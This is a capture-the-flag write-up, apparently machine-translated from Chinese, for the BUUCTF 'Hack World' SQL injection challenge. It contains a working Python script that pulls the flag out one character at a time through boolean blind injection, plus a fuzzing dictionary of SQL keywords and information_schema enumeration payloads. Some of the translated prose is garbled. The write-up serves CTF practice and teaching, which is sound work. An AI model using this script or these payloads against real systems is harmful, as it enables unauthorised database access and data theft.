BUUCTF WEB [CISCN2019 North Division Day2 Web1] Hack World
Open topic, see prompt looks like sql injection is a topic ~ ~
simple test, seemingly not being given the injection, direct blind test, constructed a wave! !
Ethereal structure: id = 1 = (1) = 1 and id = 1 = (0) = 1 display is not the same:
we can be injected according to the page display! ! fuzz wave, filtered and see what!
482 are to be filtered is:
the ok, ASCII is not filtered, substr no! ! Filtering space can be used () instead ,, <> has not been filtered, = no
write directly to the script:
import requests
import base64
import sys
import string
import hashlib
import io
import time
sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8') #改变标准输出的默认编码,否则s.text不能输出
x = string.printable
flag = ""
url = "http://56039d8e-d2a3-4fc1-8195-3e18f2c1ea8c.node3.buuoj.cn/index.php"
payload={
"id" : ""
}
for i in range(0,60):
for j in x:
payload["id"] = "1=(ascii(substr((select(flag)from(flag)),%s,1))=%s)=1"%(str(i),ord(j))
s = requests.post(url,data=payload)
#print(s.text)
if "Hello" in s.text:
flag += j
print(flag)
break
print(flag)
Obtain Flag:
SQL dictionary, their practice, missed what could add their own:
select
from
ascii
substr
table
column
by
schema
where
extractvalue
exp
if
/
(
)
%
!
@
#
$
^
&
*
-
_
+
=
'
"
~
`
\
|
,
.
||
&&
order
updatexml
limit
And
Or
%23
<
>
regex
group_concat
table_name
table_schema
column_name
database
imformation
union select
ascii(substr())
(select(group_concat(table_name))
from(information_schema.tables)where(table_schema=database())
(ascii(substr((select(group_concat(flaaag))from(flag)),%s,1))=%s)
where(table_schema=database())
